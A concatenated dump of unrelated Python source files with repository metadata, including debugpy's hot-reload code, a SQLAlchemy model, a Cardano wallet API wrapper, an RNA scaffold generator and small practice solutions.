if on_finish is not None:
# If a client wants to know about it, give him a chance.
self._on_finish_callbacks.append(on_finish)
def _update(self, namespace, name, oldobj, newobj, is_class_namespace=False):
"""Update oldobj, if possible in place, with newobj.
If oldobj is immutable, this simply returns newobj.
Args:
oldobj: the object to be updated
newobj: the object used as the source for the update
"""
try:
notify_info2('Updating: ', oldobj)
if oldobj is newobj:
# Probably something imported
return
if type(oldobj) is not type(newobj):
# Cop-out: if the type changed, give up
if name not in ('__builtins__',):
notify_error('Type of: %s (old: %s != new: %s) changed... Skipping.' % (name, type(oldobj), type(newobj)))
return
if isinstance(newobj, types.FunctionType):
self._update_function(oldobj, newobj)
return
if isinstance(newobj, types.MethodType):
self._update_method(oldobj, newobj)
return
if isinstance(newobj, classmethod):
self._update_classmethod(oldobj, newobj)
return
if isinstance(newobj, staticmethod):
self._update_staticmethod(oldobj, newobj)
return
if hasattr(types, 'ClassType'):
classtype = (types.ClassType, type) # object is not instance of types.ClassType.
else:
classtype = type
if isinstance(newobj, classtype):
self._update_class(oldobj, newobj)
return
# New: dealing with metaclasses.
if hasattr(newobj, '__metaclass__') and hasattr(newobj, '__class__') and newobj.__metaclass__ == newobj.__class__:
self._update_class(oldobj, newobj)
return
if namespace is not None:
# Check for the `__xreload_old_new__` protocol (don't even compare things
# as even doing a comparison may break things -- see: https://github.com/microsoft/debugpy/issues/615).
xreload_old_new = None
if is_class_namespace:
xreload_old_new = getattr(namespace, '__xreload_old_new__', None)
if xreload_old_new is not None:
self.found_change = True
xreload_old_new(name, oldobj, newobj)
elif '__xreload_old_new__' in namespace:
xreload_old_new = namespace['__xreload_old_new__']
xreload_old_new(namespace, name, oldobj, newobj)
self.found_change = True
# Too much information to the user...
# else:
# notify_info0('%s NOT updated. Create __xreload_old_new__(name, old, new) for custom reload' % (name,))
except:
notify_error('Exception found when updating %s. Proceeding for other items.' % (name,))
pydev_log.exception()
# All of the following functions have the same signature as _update()
def _update_function(self, oldfunc, newfunc):
"""Update a function object."""
oldfunc.__doc__ = newfunc.__doc__
oldfunc.__dict__.update(newfunc.__dict__)
try:
newfunc.__code__
attr_name = '__code__'
except AttributeError:
newfunc.func_code
attr_name = 'func_code'
old_code = getattr(oldfunc, attr_name)
new_code = getattr(newfunc, attr_name)
if not code_objects_equal(old_code, new_code):
notify_info0('Updated function code:', oldfunc)
setattr(oldfunc, attr_name, new_code)
self.found_change = True
try:
oldfunc.__defaults__ = newfunc.__defaults__
except AttributeError:
oldfunc.func_defaults = newfunc.func_defaults
return oldfunc
def _update_method(self, oldmeth, newmeth):
"""Update a method object."""
# XXX What if im_func is not a function?
if hasattr(oldmeth, 'im_func') and hasattr(newmeth, 'im_func'):
self._update(None, None, oldmeth.im_func, newmeth.im_func)
elif hasattr(oldmeth, '__func__') and hasattr(newmeth, '__func__'):
self._update(None, None, oldmeth.__func__, newmeth.__func__)
return oldmeth
def _update_class(self, oldclass, newclass):
"""Update a class object."""
olddict = oldclass.__dict__
newdict = newclass.__dict__
oldnames = set(olddict)
newnames = set(newdict)
for name in newnames - oldnames:
setattr(oldclass, name, newdict[name])
notify_info0('Added:', name, 'to', oldclass)
self.found_change = True
# Note: not removing old things...
# for name in oldnames - newnames:
# notify_info('Removed:', name, 'from', oldclass)
# delattr(oldclass, name)
for name in (oldnames & newnames) - set(['__dict__', '__doc__']):
self._update(oldclass, name, olddict[name], newdict[name], is_class_namespace=True)
old_bases = getattr(oldclass, '__bases__', None)
new_bases = getattr(newclass, '__bases__', None)
if str(old_bases) != str(new_bases):
notify_error('Changing the hierarchy of a class is not supported. %s may be inconsistent.' % (oldclass,))
self._handle_namespace(oldclass, is_class_namespace=True)
def _update_classmethod(self, oldcm, newcm):
"""Update a classmethod update."""
# While we can't modify the classmethod object itself (it has no
# mutable attributes), we *can* extract the underlying function
# (by calling __get__(), which returns a method object) and update
# it in-place. We don't have the class available to pass to
# __get__() but any object except None will do.
self._update(None, None, oldcm.__get__(0), newcm.__get__(0))
def _update_staticmethod(self, oldsm, newsm):
"""Update a staticmethod update."""
# While we can't modify the staticmethod object itself (it has no
# mutable attributes), we *can* extract the underlying function
# (by calling __get__(), which returns it) and update it in-place.
# We don't have the class available to pass to __get__() but any
# object except None will do.
self._update(None, None, oldsm.__get__(0), newsm.__get__(0))
|
[
"fabiofz@gmail.com"
] |
fabiofz@gmail.com
|
77e3a3bf9a976c804784f6bbc248d5188678a70b
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_fawn.py
|
260afb89b3b0bae13a38db08457adb7aad8566e8
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 322
|
py
|
#calss header
class _FAWN():
def __init__(self,):
self.name = "FAWN"
self.definitions = [u'a young deer', u'a pale yellowish-brown colour']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
45403bc3673f7fdd17f2e29878219415405ea12a
|
9e538305f9263d86e780a4a3f205c972f658f54d
|
/src/order/models/managers.py
|
7b7538f837adf7cf43e89ce2fef561ffcab76f9c
|
[] |
no_license
|
tanjibpa/mednet
|
bb188582b0d90407015622b34f0291557acb1919
|
19a7535d583077fec7b7030c298fceb4c4df3207
|
refs/heads/main
| 2023-05-26T07:44:27.615506
| 2021-06-10T06:30:19
| 2021-06-10T06:30:19
| 355,774,065
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 178
|
py
|
from django.db import models
class SupplierOrderList(models.Manager):
def supplier_order(self):
return super().get_queryset().filter(producer__org_type="supplier")
|
[
"ikram.tanjib@gmail.com"
] |
ikram.tanjib@gmail.com
|
db87634dbf1ae027564cb30f9a51121feedec819
|
9d3ec78e89bd3352fc037c338c6c741a2baf88d1
|
/projectrepair/models/shop_model.py
|
57872549a4f7aedfd85c1870ea1215e9d39e5900
|
[] |
no_license
|
suhas7reddy/IBHAckathon-Repair-28
|
7842b62f67cfd7e52db541433e7bd8e96b1a3c6b
|
ce0f838a16afa0dacea52a5cecdc6200356f6118
|
refs/heads/master
| 2022-01-21T20:31:53.688141
| 2019-07-22T18:57:23
| 2019-07-22T18:57:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,091
|
py
|
from flask import Flask
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from werkzeug.security import generate_password_hash, check_password_hash
engine = create_engine("mysql+pymysql://starlord:qwerty@127.0.0.1/toufique?host=localhost?port=3306", echo=True)
Base = declarative_base()
from sqlalchemy import Column, Integer, String
class Shop(Base):
__tablename__ = 'shop'
id = Column(Integer, primary_key=True)
lati = Column(String)
longi = Column(String)
emailid = Column(String)
phnno=Column(Integer)
city=Column(String)
state=Column(String)
password=Column(String(128)) ## this must be hashed
rating=Column(Integer)
def __repr__(self):
return "something"#"<Shop(lati='%s', ='%s', nickname='%s')>" % (self.name, self.fullname, self.nickname)
def selectAll(self):
conn=engine.connect()
res=conn.execute("select * from shop")
lis=res.fetchall()
ret={}
for i in lis:
k=i[0]
v=i[1:]
ret[k]=v
return ret
|
[
"palashsk2.sk@live.com"
] |
palashsk2.sk@live.com
|
9e29ecd5d2c63293fd57b88908b3776ca586eed6
|
921cc4c193089aac55e1f7a7b71f065529f82047
|
/example_simulation.py
|
2167ca29ac42e48063f5b16760f1378230282798
|
[
"MIT"
] |
permissive
|
zshwuhan/TiDeH
|
a4bd5dbf8eadf8ef8d0540cef3acc51d71a45104
|
23bc22f83925d06149933d715127d17819a62012
|
refs/heads/master
| 2023-03-16T20:59:19.433326
| 2020-12-30T09:39:40
| 2020-12-30T09:39:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,573
|
py
|
"""
This code generates a retweet dataset based on Time-Dependent Hawkes process (TiDeH).
Then, the model parameters are estimated from the dataset.
Inputs are
1) Model parameters of TiDeH (p_0, r_0, phi_0, t_m).
2) Observation time (= obs_time).
Outputs are
1) Estimate of model parameters of TiDeH (p_0, r_0, phi_0, t_m).
This code is developed by Sylvain Gauthier and Sebastian Rühl under the supervision of Ryota Kobayashi.
"""
from tideh.simulate import simulate_time_rescaling
from tideh.functions import infectious_rate_tweets
from tideh import load_events_vec
from tideh import estimate_parameters
# load pool of follower counts used for simulation from file
file_path = 'data/example/sample_file.txt'
_, (_, follower) = load_events_vec(file_path)
runtime = 48 # simulate for 2 days
# parameters of infectious rate
p0 = 0.001
r0 = 0.424
phi0 = 0.125
taum = 2.
# simulate
events = simulate_time_rescaling(runtime=runtime, p=lambda t: infectious_rate_tweets(t, p0, r0, phi0, taum),
follower_pool=follower[1:], int_fol_cnt=follower[0])
# estimate original infectious rate parameters
add_params = {'bounds': [(-1, 0.5), (1, 20.)]}
params, err, _ = estimate_parameters(events=events, obs_time=runtime, **add_params)
print("Estimated parameters are (actual value):")
print("p0: %.5f (%0.3f)" % (params[0], p0))
print("r0: %.5f (%0.3f)" % (params[1], r0))
print("phi0: %.5f (%0.3f)" % (params[2], phi0))
print("tm: %.5f (%0.3f)" % (params[3], taum))
print("Average %% error (estimated to fitted): %.2f" % (err * 100))
|
[
"sebaruehl@gmail.com"
] |
sebaruehl@gmail.com
|
4fb3594ea95eb143e256712a4f0ff5e30ff4aa43
|
4c6e41781679cd487283824609bd4133f22fae95
|
/gui/Experiment/groundStation/win_Home.py
|
d26fc9a653d65e1e6e252e3ee36e84a15a09b5f7
|
[] |
no_license
|
Rachmitah/Final-Project
|
4b65aaecf2158e2e3caf22b37176c4c23252c60c
|
52a71d9750b42e36c8e4c2ea9949d2d2c43aac48
|
refs/heads/master
| 2021-09-19T16:54:17.492266
| 2018-07-29T16:02:23
| 2018-07-29T16:02:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 893
|
py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import sys
from PyQt5.QtWidgets import QMainWindow, QAction, qApp, QApplication
from PyQt5.QtGui import QIcon
class Example(QMainWindow):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
exitAction = QAction(QIcon('layout/ui-icons/32/close.png'), '&Exit', self)
exitAction.setShortcut('Ctrl+Q')
exitAction.setStatusTip('Exit application')
exitAction.triggered.connect(qApp.quit)
self.statusBar()
menubar = self.menuBar()
fileMenu = menubar.addMenu('&File')
fileMenu.addAction(exitAction)
self.setGeometry(300, 300, 300, 200)
self.setWindowTitle('Menubar')
self.show()
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Example()
sys.exit(app.exec_())
|
[
"mangatkk@gmail.com"
] |
mangatkk@gmail.com
|
617c1aed9193403c0aede29ae9f4b16fbb7c1144
|
6c8e93ba0f2742c5cc59c4c0b03a04f3992619e2
|
/MOOGabund.py
|
b904b37cf359334f28140dd40da32da939bf0b6e
|
[] |
no_license
|
christinagilligan/MetalPoorStars
|
192aecd8ab803c222af4bfe59fffe1fa13df4c4f
|
5571c1cd0cbfa05434f593b7ad6ab77f9d1de667
|
refs/heads/master
| 2020-03-22T04:14:19.800174
| 2018-07-16T18:05:15
| 2018-07-16T18:05:15
| 139,483,767
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,002
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon May 7 15:07:30 2018
@author: christinagilligan
"""
#convert csv to a MOOG input file
import csv
import numpy as np
import matplotlib.pyplot as plt
ion=[]
wavelength=[]
eqwA=[]
eqwmA=[]
Notes=[]
extra1=[]
extra2=[]
extra3=[]
extra4=[]
extra5=[]
#change starname to whatever to make the file
starname='HIP106924'
filename=str(starname)+'abund.csv'
f = open(filename)
csv_f = csv.reader(f)
next(csv_f)
abund = np.array(list(csv_f))
ion=np.array(abund[:,0])
wavelength=np.array(abund[:,1],dtype=float)
eqwA=np.array(abund[:,2])
eqwmA=np.array(abund[:,3],dtype=float)
#need to find loggf and ep values for each wavelength
wavelength_all=[]
ep=[]
loggf=[]
#only get Fe lines
file = open('metalpoorfe.dat')
for line in file:
if 'Fe' not in line and 'Wavelength' not in line and len(line.strip())!=0:
line=line.strip()
line=line.split()
line=np.asarray(line)
wavelength_all.append(line[0])
ep.append(line[2])
loggf.append(line[3])
wavelength_all=np.asarray(wavelength_all)
file = open(str(starname)+'.dat','w')
file.write('Fe Lines in '+str(starname)+'\n')
for i in range(0,len(ion)-1):
if eqwmA[i]!= 0 and ion[i]=='FeI':
index=np.flatnonzero(float("{0:.2f}".format(wavelength[i])) == wavelength_all.astype(float))
loggf_value=loggf[index[0]]
ep_value=ep[index[0]]
file.write(' '+"{0:.2f}".format(wavelength[i])+' '+str(26.0)+' '+str(ep_value)+' '+str(loggf_value)+' '+str(eqwmA[i])+'\n')
if eqwmA[i]!= 0 and ion[i]=='FeII':
index[0]=np.flatnonzero(float("{0:.2f}".format(wavelength[i])) == wavelength_all.astype(float))
loggf_value=loggf[index[0]]
ep_value=ep[index[0]]
file.write(' '+"{0:.2f}".format(wavelength[i])+' '+str(26.1)+' '+str(ep_value)+' '+str(loggf_value)+' '+str(eqwmA[i])+'\n')
file.close()
|
[
"christinagilligan@gmail.com"
] |
christinagilligan@gmail.com
|
8f45cff222fbcf136ef6cdd1fe4f7f7808ae38d0
|
61e698839a4a355a26023542c3c277fa72a52387
|
/ZJU-Python/CH3/ch3-5.py
|
3ea059aa708f84d52ddd63ec89c09e3ff02ecce1
|
[] |
no_license
|
JiahuiQiu/Python-Learning
|
b51fd224bf3228b858d7dc5db76fd8852ebbee4a
|
9d704e51e2e9f3121117e9170e840e1df4879e0e
|
refs/heads/master
| 2021-04-16T18:11:37.903225
| 2021-02-11T06:38:10
| 2021-02-11T06:38:10
| 249,374,606
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 549
|
py
|
# -*- coding: utf-8 -*-
"""
字符转换
本题要求提取一个字符串中的所有数字字符('0'……'9'),将其转换为一个整数输出。
输入格式:
输入在一行中给出一个不超过80个字符且以回车结束的字符串。
输出格式:
在一行中输出转换后的整数。题目保证输出不超过长整型范围。
输入样例:
free82jeep5
输出样例:
825
"""
a = input()
s1 = ""
s2 = "0123456789"
for i in list(a):
if i in s2:
s1 += i
print(int(s1))
|
[
"noreply@github.com"
] |
noreply@github.com
|
57334a3b2339be3bc7d8390a3d7b5d968de8ed90
|
c6553cfb21edc9da3b441eb9b9e67eea47c42680
|
/top50check.py
|
6ad93e8843476253ec6d703c7c87558250448c69
|
[] |
no_license
|
vishruthvipra/spam-detector
|
c70315e34af6553ee45faa7a526d3a1e6198ac80
|
6a2f3fe2967468f438a5eb66caf00ec8bb93767e
|
refs/heads/master
| 2020-04-03T18:27:21.512856
| 2018-10-31T02:18:10
| 2018-10-31T02:18:10
| 155,484,911
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,279
|
py
|
TRIALA = '/Users/vishruthkrishnaprasad/Downloads/IR/ASSGN7/result/decision_tree_train_performance_trial_a'
TRIALB = '/Users/vishruthkrishnaprasad/Downloads/IR/ASSGN7/result/decision_tree_train_performance_trial_b'
OUTPUTTOTAL = '/Users/vishruthkrishnaprasad/Downloads/IR/ASSGN7/output_total'
def main():
f = open(TRIALA, "r")
score = 0
for line in f.readlines()[:50]:
_, _, grade, _ = line.split()
grade = float(grade)
score += grade
accuracy = score / 50 * 100
print "Accuracy for top 50 manual:", accuracy
f.close()
f = open(TRIALB, "r")
score = 0
for line in f.readlines()[:50]:
_, _, grade, _ = line.split()
grade = float(grade)
score += grade
accuracy = score / 50 * 100
print "Accuracy for top 50 spamwords:", accuracy
f.close()
f = open(OUTPUTTOTAL, "r")
allscores = []
score = 0
for line in f.readlines()[1:]:
_, grade, _ = line.split()
grade = float(grade)
allscores.append(grade)
newscores = sorted(allscores, reverse=True)
for grade in newscores[:50]:
score += grade
accuracy = score / 50 * 100
print "Accuracy for top 50 unigrams:", accuracy
f.close()
if __name__ == '__main__':
main()
|
[
"krishnaprasad.v@husky.neu.edu"
] |
krishnaprasad.v@husky.neu.edu
|
b7cbd5a455bd6dcba44b9d1f0d98e19cd9264524
|
86b670d48d6f497136c9386a6637bb2b4c35a655
|
/GenerateLibrary/generateScaffolds.py
|
c5928887f09126cf833bc80e7effaffe476616ab
|
[] |
no_license
|
nbisaria/RNAfold
|
11ff6ffc1792c8b998b3a28b1c3040fc694696b4
|
ed9828549a243b9d1a654c743ae392ebaba12737
|
refs/heads/master
| 2020-04-02T07:11:31.489686
| 2018-11-06T23:42:29
| 2018-11-06T23:42:29
| 154,185,399
| 0
| 0
| null | 2018-10-26T21:40:23
| 2018-10-22T17:22:21
|
Python
|
UTF-8
|
Python
| false
| false
| 2,805
|
py
|
import RNA
import subprocess
import pandas as pd
import imp
from random import random
imp.load_source("walkerrandom",("/lab/bartel1_ata/nbisaria/RNAfold/subfunctions/walkerrandom.py"))
from walkerrandom import Walkerrandom
from collections import defaultdict
imp.load_source("general",("/lab/bartel1_ata/nbisaria/RNAfold/subfunctions/general.py"))
from general import *
def GenerateRandomScaffAndLinker(n):
per_AU_scaff = 0.65
per_AU_linker = 0.85
len_scaff = 10
len_linker = 2
Scaffprob = dict( A=per_AU_scaff/2, U=per_AU_scaff/2, C=(1-per_AU_scaff)/2, G=(1-per_AU_scaff)/2 )
srand = Walkerrandom( Scaffprob.values(), Scaffprob.keys() )
Linkprob = dict( A=per_AU_linker/2, U=per_AU_linker/2, C=(1-per_AU_linker)/2, G=(1-per_AU_linker)/2 )
lrand = Walkerrandom( Linkprob.values(), Linkprob.keys())
numhits = 0
contexts_final = defaultdict()
seqsfilter = GetMotifstoFilter()
def makeSeqwProb(l,wrand):
s = ''
for i in range(0,l):
s = s + wrand.random()
return s
MS2 = Get_MS2()
PP7 = Get_PP7()
fivep, threep = GetFlankingseqs()
db_final = '......................(((((((.((((......)))))))))))))))))....................(((((((.((....))))))))).......................'
while numhits < n:
l1 = makeSeqwProb(len_linker, lrand)
l2 = makeSeqwProb(len_linker, lrand)
l3 = makeSeqwProb(len_linker, lrand)
l4 = makeSeqwProb(len_linker, lrand)
s1 = makeSeqwProb(len_scaff, srand)
s2 = makeSeqwProb(len_scaff, srand)
# right now R2 and revcomp(R1) makes a giant hairpin:
#'...(((....(((..(((((((((((((((((....)))))))))))).)))))..)))...))).......'
# this is using the R2 + get_rc(R1)
# perhaps need to add a constant new sequence + BstX1 sites and use some dark cycles
# the library itself will have only a subset of R2 (or all of R2 depending on PCR and then we will add BstXI sites using PCR)
seq_final = fivep + l1+PP7 + l2 +l3 + MS2 + l4 + threep
print(len(seq_final))
dG, db = GetdG_dotbracket(seq_final)
# constrain = db[0:3] + db[11:15] + db[22:25] + db[-3:] + db[-26:-22] + db[-14:-10]
# constrain = db[0:3] + db[11:15] + db[-3:] + db[-14:-10]
print(dG,db)
# print(db)
if (dG > -25.6) and not any(motif in seq_final for motif in seqsfilter):
# if (db == db_final) and not any(motif in seq_final for motif in seqsfilter):
print(seq_final)
print(dG, db)
numhits = numhits + 1
contexts_final['c' + str(numhits)] = [l1,PP7, l2, l3, MS2, l4]
return contexts_final
def main():
n=10
c_final = GenerateRandomScaffAndLinker(n)
print(c_final)
if __name__ == "__main__":
main()
|
[
"nbisaira@gmail.com"
] |
nbisaira@gmail.com
|
2f956f1da85659a14cb9e78cec49ba3da20a8935
|
bf9f01c390ba5e1448c461d4e22c404cddf30ddd
|
/cardano_wrapper/wrappers/WalletWrap.py
|
a0e4d569a9c8249c3826c4090aa08b8f769ffe41
|
[] |
no_license
|
Mercurial/cardano-wrapper
|
0f25251570d057b8dad483f1484d563aea875123
|
0c5c89848e42e15deadb13e657063070bc620d3d
|
refs/heads/main
| 2023-05-09T06:35:55.542452
| 2021-05-27T04:55:19
| 2021-05-27T04:55:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,605
|
py
|
import json
import time
from os import path
import requests
import yaml
import subprocess
from cardano_wrapper.wrappers.AddressWrap import AddressWrap
from cardano_wrapper.utils import bcolors
class WalletWrap(object):
def __init__(self):
"""This object wraps the Cardano Wallet API so that we can use Python functionality
to recieve and send API endpoint requests.
"""
self.headers = {
"Accept": "application/json",
"Content-type": "application/json",
}
self.setup()
def setup(self, file="conf.yaml"):
conf_path = path.join(path.dirname(__file__), "../../conf.yaml")
with open(conf_path, "r") as stream:
conf = yaml.safe_load(stream)
self.server = conf.get("wallet_server")
if not self.server:
raise ValueError(
f"{bcolors.WARNING}Define server in `{file}`.{bcolors.ENDC}"
)
else:
print(f"Sending requests to {self.server}")
self.version = conf.get("wallet_version")
r = requests.get(f"{self.server}/{self.version}/network/information")
return r.raise_for_status()
def make_wallet_path(self, wallet_type):
"""[summary]
Args:
wallet_type (str): Either "shelley" or "byron".
Raises:
ValueError: Raised if the wallet is not "shelley" or "byron".
Returns:
str: Formatted `wallets` URL path.
"""
if wallet_type == "shelley":
return "wallets"
elif wallet_type == "byron":
print(
f"{bcolors.WARNING}Warning:{bcolors.ENDC} Since you're using Byron, there might be some errors. "
"The construction of random wallet in itself is deprecated, in particular "
"the restoration from an encrypted root private key. These endpoints exist "
"to ease migrations from legacy software such as cardano-sl but should be "
"avoided by new applications."
)
return "byron-wallets"
else:
raise ValueError(
f"{bcolors.FAIL}Empty or incorrect wallet type.{bcolors.ENDC}"
)
def network_information(self):
print("*** Get network information. ***")
r = requests.get(f"{self.server}/{self.version}/network/information")
print(r.status_code)
if r.status_code == 404:
raise ConnectionError(
f"{bcolors.WARNING}Please check your server URL in the config.{bcolors.ENDC}"
)
return r.json()
def create_wallet(self, wallet_type, name, passphrase, mnemonic, style="random"):
wallets = self.make_wallet_path(wallet_type)
print("*** Create Wallet. ***")
endpoint = f"{self.server}/{self.version}/{wallets}/"
r = requests.post(
endpoint,
json={
"style": style,
"name": name,
"passphrase": passphrase,
"mnemonic_sentence": mnemonic,
},
headers=self.headers,
)
print(json.dumps(mnemonic))
return r.json()
def create_address(self, wallet_type, wallet_id, passphrase, address_index=0):
wallets = self.make_wallet_path(wallet_type)
if wallet_type == "shelley":
endpoint = f"{self.server}/{self.version}/{wallets}/{wallet_id}/addresses"
r = requests.post(
endpoint,
json={
"payment": {
"any": [
"addr_shared_vkh1zxt0uvrza94h3hv4jpv0ttddgnwkvdgeyq8jf9w30mcs6y8w3nq",
]
},
},
headers=self.headers,
)
else:
endpoint = f"{self.server}/{self.version}/{wallets}/{wallet_id}/addresses"
r = requests.post(
endpoint,
json={
"passphrase": passphrase,
"address_index": address_index,
},
headers=self.headers,
)
return r.json()
def create_transaction(
self, wallet_type, wallet_id, to_address, quantity, assets=None
):
wallets = self.make_wallet_path(wallet_type)
endpoint = f"{self.server}/{self.version}/{wallets}/{wallet_id}/payment-fees"
print(endpoint)
payload = {
"payments": [
{
"address": to_address,
"amount": {"quantity": quantity, "unit": "lovelace"},
}
]
}
if assets:
policy_id = assets["policy_id"]
asset_name = assets["asset_name"]
quantity = assets["quantity"]
assets: [
{
"policy_id": policy_id,
"asset_name": asset_name,
"quantity": quantity,
}
]
payload["payments"][0]["assets"] = assets
r = requests.post(
endpoint,
json=payload,
headers=self.headers,
)
return r.json()
def delete_wallet(self, wallet_type, wallet_id):
wallets = self.make_wallet_path(wallet_type)
print("*** Deleting Wallet. ***")
r = requests.delete(
f"{self.server}/{self.version}/{wallets}/{wallet_id}",
)
print(f"*** Wallet {wallet_id} deleted. ***")
return True
def inspect_wallet(self, wallet_type, wallet_id, start=None, stop=None):
wallets = self.make_wallet_path(wallet_type)
endpoint = f"{self.server}/{self.version}/{wallets}/{wallet_id}"
print(endpoint)
r = requests.get(endpoint)
print("HERE")
print(r.json())
return r.json()
def inspect_address(self, address):
wallets = self.make_wallet_path(wallet_type)
endpoint = f"{self.server}/{self.version}/addresses/{address}"
print(endpoint)
r = requests.get(endpoint)
return r.json()
def list_wallets(self, wallet_type):
wallets = self.make_wallet_path(wallet_type)
print("*** List Wallet Information. ***")
endpoint = f"{self.server}/{self.version}/{wallets}"
print(endpoint)
r = requests.get(endpoint)
return r.json()
def list_utxo(self, wallet_id):
print("*** Get UTxO Statistics. ***")
endpoint = f"{self.server}/{self.version}/{wallet_id}/statistics/utxos"
r = requests.get(endpoint)
return r.json()
def list_addresses(self, wallet_type, wallet_id):
wallets = self.make_wallet_path(wallet_type)
print("*** List addresses. ***")
endpoint = f"{self.server}/{self.version}/{wallets}/{wallet_id}/addresses"
r = requests.get(endpoint)
return r.json()
def list_transactions(self, wallet_type, wallet_id, start=None, end=None):
wallets = self.make_wallet_path(wallet_type)
r = requests.get(
f"{self.server}/{self.version}/{wallets}/{wallet_id}/transactions"
)
return r.json()
def list_stakepools(self):
print("*** List stakepools. ***")
r = requests.get(f"{self.server}/{self.version}/stake-pools")
return r.json()
def join_stakepool(self, stake_pool_id, wallet_id, passphrase):
endpoint = (
f"{self.server}/{self.version}/stake-pools/{stakePoolId}/wallets/{walletId}"
)
r = requests.put(
endpoint,
json={
"passphrase": passphrase,
},
headers=self.headers,
)
return r.json()
def join_stakepools(self, wallet_id, passphrase):
endpoint = f"{self.server}/{self.version}/stake-pools/*/wallets/{walletId}"
r = requests.get(
endpoint,
json={
"passphrase": passphrase,
},
headers=self.headers,
)
return r.json()
def is_sync_ready(self):
progress = self.network_information()["sync_progress"]["status"]
print(progress)
return progress == "ready"
def smash_health(self):
r = requests.get(f"{self.server}/{self.version}/smash/health")
return r.json()
def network_clock(self):
print("*** Get network clock. ***")
r = requests.get(f"{self.server}/{self.version}/network/clock")
return r.json()
def network_parameters(self):
r = requests.get(f"{self.server}/{self.version}/network/parameters")
return r.json()
def settings(self):
r = requests.get(f"{self.server}/{self.version}/settings")
return r.json()
def utxo_statistics(self, wallet_id):
print("*** Get UTxO Statistics. ***")
r = requests.get(f"{self.server}/{self.version}/{wallet_id}/statistics/utxos")
return r.json()
def update_wallet_name(self, wallets, wallet_id, name):
print("*** Update wallet name. ***")
r = requests.put(
f"{self.server}/{self.version}/{wallets}/{wallet_id}",
json={
"name": name,
},
)
return r.json()
def update_wallet_passphrase(
self, wallets, wallet_id, old_passphrase, new_passphrase
):
print("*** Update wallet passphrase. ***")
r = requests.put(
f"{self.server}/{self.version}/{wallets}/{wallet_id}/passphrase",
json={
"old_passphrase": old_passphrase,
"new_passphrase": new_passphrase,
},
)
return r.json()
def list_wallet_assets(self, wallets, wallet_id):
print("*** List assets. ***")
r = requests.get(f"{self.server}/{self.version}/{wallets}/{wallet_id}/assets")
return r.json()
def maintenance_ations(self, wallet_id):
print("*** List maintenance actions. ***")
r = requests.get(
f"{self.server}/{self.version}/stake-pools/maintenance-actions"
)
return r.json()
def delegation_fees(self, wallets, wallet_id):
print("*** List delegation fees. ***")
r = requests.get(
f"{self.server}/{self.version}/{wallets}/{wallet_id}/delegation-fees"
)
return r.json()
def coin_selections(self, wallets, wallet_id):
print("*** Select coins to cover the given set of payments. ***")
r = requests.post(
f"{self.server}/{self.version}/{wallets}/{wallet_id}/coin-selections/random"
)
print(r.json())
def shared_wallets(self, wallets, wallet_id):
print("*** Get share wallets. ***")
r = requests.get(f"{self.server}/{self.version}/shared-wallets/{wallet_id}/")
print(r.json())
if __name__ == "__main__":
wallet = WalletWrap()
print(wallet.network_information())
print(wallet.is_sync_ready())
print(wallet.list_wallets())
name = "Test Wallet May 6 2021"
passphrase = "Very important!!!"
# mnemonic = AddressWrapper.get_mnemonic(12)
mnemonic = [
"squirrel",
"material",
"silly",
"twice",
"direct",
"slush",
"pistol",
"razor",
"become",
"junk",
"kingdom",
"flee",
]
wallet.create_wallet(name, passphrase, mnemonic, wallet_type="byron")
print("Should be created...")
print(wallet.list_addresses())
print(wallet.list_wallets())
|
[
"vishal.h.lall@gmail.com"
] |
vishal.h.lall@gmail.com
|
d2efcc764e27da871a5ee47f86deb93305ffb268
|
4ac0636ef316ed10e4f5286d4311969f28a93adf
|
/ntech.py
|
79504af7a61e2b464ca394e26d0c2f3cbec415a7
|
[] |
no_license
|
smothly/algorithm-solving
|
9afad7bb6bf9c7117c0c9fecba5a827ec5e7d927
|
7a72f091a2de1e6af44343ffff79ab11a7a3bac9
|
refs/heads/master
| 2022-12-23T12:24:14.837968
| 2020-10-03T14:52:42
| 2020-10-03T14:52:42
| 263,236,265
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,139
|
py
|
def solution(flowers):
answer = 0
# sort
flowers.sort(key=lambda x:(x[0], x[1]))
new_days = []
# 겹치는 부분을 합치는 과정
for i in range(len(flowers)-1):
if flowers[i][1] >= flowers[i+1][0]:
new_days.append((flowers[i][0], flowers[i+1][1]))
else:
new_days.append((flowers[i][0], flowers[i][1]))
print(new_days)
return sum(new_days, key=lambda x: x[1] - x[0])
def solution(histogram):
start, end = 0, len(histogram) - 1
answer = 0
while True:
print(start, end)
if histogram[end-1] > histogram[end]:
end -= 1
elif histogram[start+1] > histogram[start]:
start += 1
else:
answer = (end - start - 1) * min([histogram[start], histogram[end]])
break
return answer
def solution(N):
answer = 0
if N <= 2:
return N
dp = [1, 2]
for i in range(2, N):
dp.append(2 * dp[i-1] + i -1)
print(dp)
return dp[-1]
solution(6)
|
[
"seungho546@naver.com"
] |
seungho546@naver.com
|
6af689639ddfcb358242510a287fa6c89aca2e3a
|
b22588340d7925b614a735bbbde1b351ad657ffc
|
